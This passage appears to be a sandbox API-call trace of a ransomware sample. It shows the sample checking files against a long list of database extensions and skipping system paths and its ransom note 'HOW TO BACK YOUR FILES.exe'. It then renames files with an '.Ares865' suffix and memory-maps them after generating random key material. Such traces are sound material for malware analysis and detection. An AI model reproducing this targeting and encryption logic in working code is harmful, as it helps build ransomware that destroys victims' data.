7 [0056.528] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0056.528] lstrlenW (lpString="sqlitedb") returned 8 [0056.528] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0056.528] lstrlenW (lpString="xml") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0056.528] lstrlenW (lpString="$er") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0056.528] lstrlenW (lpString="4dd") returned 3 [0056.528] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0056.529] lstrlenW (lpString="4dl") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0056.529] lstrlenW (lpString="^^^") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0056.529] lstrlenW (lpString="abs") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0056.529] lstrlenW (lpString="abx") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0056.529] lstrlenW (lpString="accdb") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0056.529] lstrlenW (lpString="accdc") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0056.529] lstrlenW (lpString="accde") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0056.529] lstrlenW (lpString="accdr") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0056.529] lstrlenW (lpString="accdt") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0056.529] lstrlenW (lpString="accdw") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0056.529] lstrlenW (lpString="accft") returned 5 [0056.529] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0056.529] lstrlenW (lpString="adb") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.529] lstrlenW (lpString="adb") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0056.529] lstrlenW (lpString="ade") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0056.529] lstrlenW (lpString="adf") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0056.529] lstrlenW (lpString="adn") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0056.529] lstrlenW (lpString="adp") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0056.529] lstrlenW (lpString="alf") returned 3 [0056.529] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0056.529] lstrlenW (lpString="ask") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0056.530] lstrlenW (lpString="btr") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0056.530] lstrlenW (lpString="cat") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0056.530] lstrlenW (lpString="cdb") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0056.530] lstrlenW (lpString="ckp") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0056.530] lstrlenW (lpString="cma") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0056.530] lstrlenW (lpString="cpd") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0056.530] lstrlenW (lpString="dacpac") returned 6 [0056.530] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0056.530] lstrlenW (lpString="dad") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0056.530] lstrlenW (lpString="dadiagrams") returned 10 [0056.530] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0056.530] lstrlenW (lpString="daschema") returned 8 [0056.530] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0056.530] lstrlenW (lpString="db-journal") returned 10 [0056.530] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0056.530] lstrlenW (lpString="db-shm") returned 6 [0056.530] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0056.530] lstrlenW (lpString="db-wal") returned 6 [0056.530] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0056.530] lstrlenW (lpString="dbc") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0056.530] lstrlenW (lpString="dbs") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0056.530] lstrlenW (lpString="dbt") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0056.530] lstrlenW (lpString="dbv") returned 3 [0056.530] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0056.530] lstrlenW (lpString="dbx") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0056.531] lstrlenW (lpString="dcb") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0056.531] lstrlenW (lpString="dct") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0056.531] lstrlenW (lpString="dcx") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0056.531] lstrlenW (lpString="ddl") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0056.531] lstrlenW (lpString="dlis") returned 4 [0056.531] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0056.531] lstrlenW (lpString="dp1") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0056.531] lstrlenW (lpString="dqy") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0056.531] lstrlenW (lpString="dsk") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0056.531] lstrlenW (lpString="dsn") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0056.531] lstrlenW (lpString="dtsx") returned 4 [0056.531] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0056.531] lstrlenW (lpString="dxl") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0056.531] lstrlenW (lpString="eco") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0056.531] lstrlenW (lpString="ecx") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0056.531] lstrlenW (lpString="edb") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0056.531] lstrlenW (lpString="epim") returned 4 [0056.531] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0056.531] lstrlenW (lpString="fcd") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0056.531] lstrlenW (lpString="fdb") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0056.531] lstrlenW (lpString="fic") returned 3 [0056.531] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0056.531] lstrlenW (lpString="flexolibrary") returned 12 [0056.532] lstrlenW (lpString="fm5") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0056.532] lstrlenW (lpString="fmp") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0056.532] lstrlenW (lpString="fmp12") returned 5 [0056.532] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0056.532] lstrlenW (lpString="fmpsl") returned 5 [0056.532] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0056.532] lstrlenW (lpString="fol") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0056.532] lstrlenW (lpString="fp3") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0056.532] lstrlenW (lpString="fp4") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0056.532] lstrlenW (lpString="fp5") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0056.532] lstrlenW (lpString="fp7") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0056.532] lstrlenW (lpString="fpt") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0056.532] lstrlenW (lpString="frm") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0056.532] lstrlenW (lpString="gdb") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.532] lstrlenW (lpString="gdb") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0056.532] lstrlenW (lpString="grdb") returned 4 [0056.532] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0056.532] lstrlenW (lpString="gwi") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0056.532] lstrlenW (lpString="hdb") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0056.532] lstrlenW (lpString="his") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0056.532] lstrlenW (lpString="ib") returned 2 [0056.532] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0056.532] lstrlenW (lpString="idb") returned 3 [0056.532] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0056.533] lstrlenW (lpString="ihx") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0056.533] lstrlenW (lpString="itdb") returned 4 [0056.533] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0056.533] lstrlenW (lpString="itw") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0056.533] lstrlenW (lpString="jet") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0056.533] lstrlenW (lpString="jtx") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0056.533] lstrlenW (lpString="kdb") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0056.533] lstrlenW (lpString="kexi") returned 4 [0056.533] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0056.533] lstrlenW (lpString="kexic") returned 5 [0056.533] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0056.533] lstrlenW (lpString="kexis") returned 5 [0056.533] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0056.533] lstrlenW (lpString="lgc") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0056.533] lstrlenW (lpString="lwx") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0056.533] lstrlenW (lpString="maf") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0056.533] lstrlenW (lpString="maq") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0056.533] lstrlenW (lpString="mar") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0056.533] lstrlenW (lpString="marshal") returned 7 [0056.533] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0056.533] lstrlenW (lpString="mas") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0056.533] lstrlenW (lpString="mav") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0056.533] lstrlenW (lpString="maw") returned 3 [0056.533] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0056.533] lstrlenW (lpString="mdbhtml") returned 7 [0056.534] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0056.534] lstrlenW (lpString="mdn") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0056.534] lstrlenW (lpString="mdt") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0056.534] lstrlenW (lpString="mfd") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0056.534] lstrlenW (lpString="mpd") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0056.534] lstrlenW (lpString="mrg") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0056.534] lstrlenW (lpString="mud") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0056.534] lstrlenW (lpString="mwb") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0056.534] lstrlenW (lpString="myd") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0056.534] lstrlenW (lpString="ndf") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0056.534] lstrlenW (lpString="nnt") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0056.534] lstrlenW (lpString="nrmlib") returned 6 [0056.534] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0056.534] lstrlenW (lpString="ns2") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0056.534] lstrlenW (lpString="ns3") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0056.534] lstrlenW (lpString="ns4") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0056.534] lstrlenW (lpString="nsf") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0056.534] lstrlenW (lpString="nv") returned 2 [0056.534] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0056.534] lstrlenW (lpString="nv2") returned 3 [0056.534] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0056.534] lstrlenW (lpString="nwdb") returned 4 [0056.534] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0056.535] lstrlenW (lpString="nyf") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0056.535] lstrlenW (lpString="odb") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.535] lstrlenW (lpString="odb") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0056.535] lstrlenW (lpString="oqy") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0056.535] lstrlenW (lpString="ora") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0056.535] lstrlenW (lpString="orx") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0056.535] lstrlenW (lpString="owc") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0056.535] lstrlenW (lpString="p96") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0056.535] lstrlenW (lpString="p97") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0056.535] lstrlenW (lpString="pan") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0056.535] lstrlenW (lpString="pdb") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0056.535] lstrlenW (lpString="pdm") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0056.535] lstrlenW (lpString="pnz") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0056.535] lstrlenW (lpString="qry") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0056.535] lstrlenW (lpString="qvd") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0056.535] lstrlenW (lpString="rbf") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0056.535] lstrlenW (lpString="rctd") returned 4 [0056.535] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0056.535] lstrlenW (lpString="rod") returned 3 [0056.535] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0056.535] lstrlenW (lpString="rodx") returned 4 [0056.535] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0056.536] lstrlenW (lpString="rpd") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0056.536] lstrlenW (lpString="rsd") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0056.536] lstrlenW (lpString="sas7bdat") returned 8 [0056.536] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0056.536] lstrlenW (lpString="sbf") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0056.536] lstrlenW (lpString="scx") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0056.536] lstrlenW (lpString="sdb") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0056.536] lstrlenW (lpString="sdc") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0056.536] lstrlenW (lpString="sdf") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0056.536] lstrlenW (lpString="sis") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0056.536] lstrlenW (lpString="spq") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0056.536] lstrlenW (lpString="te") returned 2 [0056.536] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0056.536] lstrlenW (lpString="teacher") returned 7 [0056.536] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0056.536] lstrlenW (lpString="tmd") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0056.536] lstrlenW (lpString="tps") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0056.536] lstrlenW (lpString="trc") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.536] lstrlenW (lpString="trc") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0056.536] lstrlenW (lpString="trm") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0056.536] lstrlenW (lpString="udb") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0056.536] lstrlenW (lpString="udl") returned 3 [0056.536] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0056.537] lstrlenW (lpString="usr") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0056.537] lstrlenW (lpString="v12") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0056.537] lstrlenW (lpString="vis") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0056.537] lstrlenW (lpString="vpd") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0056.537] lstrlenW (lpString="vvv") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0056.537] lstrlenW (lpString="wdb") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0056.537] lstrlenW (lpString="wmdb") returned 4 [0056.537] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0056.537] lstrlenW (lpString="wrk") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0056.537] lstrlenW (lpString="xdb") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0056.537] lstrlenW (lpString="xld") returned 3 [0056.537] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0056.537] lstrlenW (lpString="xmlff") returned 5 [0056.537] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0056.537] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Documents\\desktop.ini.Ares865") returned 45 [0056.537] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Documents\\desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), lpNewFileName="C:\\Users\\Public\\Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\documents\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0056.538] CreateFileW (lpFileName="C:\\Users\\Public\\Documents\\desktop.ini.Ares865" (normalized: "c:\\users\\public\\documents\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0056.538] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=278) returned 1 [0056.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0056.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cc5b0 [0056.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0056.538] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f00d8) returned 1 [0056.539] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0056.539] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0056.539] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x12c [0056.563] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x190000 [0056.563] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2effc8) returned 1 [0056.564] CryptGenRandom (in: hProv=0x2effc8, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0056.564] CryptReleaseContext (hProv=0x2effc8, dwFlags=0x0) returned 1 [0056.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d1ea0 [0056.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0056.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0056.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0056.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0056.564] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0056.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0056.564] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0056.565] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0056.565] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0056.565] CloseHandle (hObject=0x12c) returned 1 [0056.565] CloseHandle (hObject=0x15c) returned 1 [0056.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cc5b0 | out: hHeap=0x2b0000) returned 1 [0056.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0056.566] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0056.566] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498af5a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x498af5a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0056.566] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0056.566] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Music", cAlternateFileName="MYMUSI~1")) returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="aoldtz.exe") returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2=".") returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="..") returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="windows") returned -1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="bootmgr") returned 1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="temp") returned -1 [0056.566] lstrcmpiW (lpString1="My Music", lpString2="pagefile.sys") returned -1 [0056.567] lstrcmpiW (lpString1="My Music", lpString2="boot") returned 1 [0056.567] lstrcmpiW (lpString1="My Music", lpString2="ids.txt") returned 1 [0056.567] lstrcmpiW (lpString1="My Music", lpString2="ntuser.dat") returned -1 [0056.567] lstrcmpiW (lpString1="My Music", lpString2="perflogs") returned -1 [0056.567] lstrcmpiW (lpString1="My Music", lpString2="MSBuild") returned 1 [0056.567] lstrlenW (lpString="My Music") returned 8 [0056.567] lstrlenW (lpString="C:\\Users\\Public\\Documents\\desktop.ini") returned 37 [0056.567] lstrcpyW (in: lpString1=0x2cce434, lpString2="My Music" | out: lpString1="My Music") returned="My Music" [0056.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0056.567] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x46) returned 0x2ee970 [0056.567] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7bb0 [0056.567] FindNextFileW (in: hFindFile=0x2ccda8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3079b513, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3079b513, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3079b513, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="aoldtz.exe") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2=".") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="..") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="windows") returned -1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="bootmgr") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="temp") returned -1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="pagefile.sys") returned -1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="boot") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="ids.txt") returned 1 [0056.567] lstrcmpiW (lpString1="My Pictures", lpString2="ntuser.dat") returned -1 [0056.567] lstrcmpiW 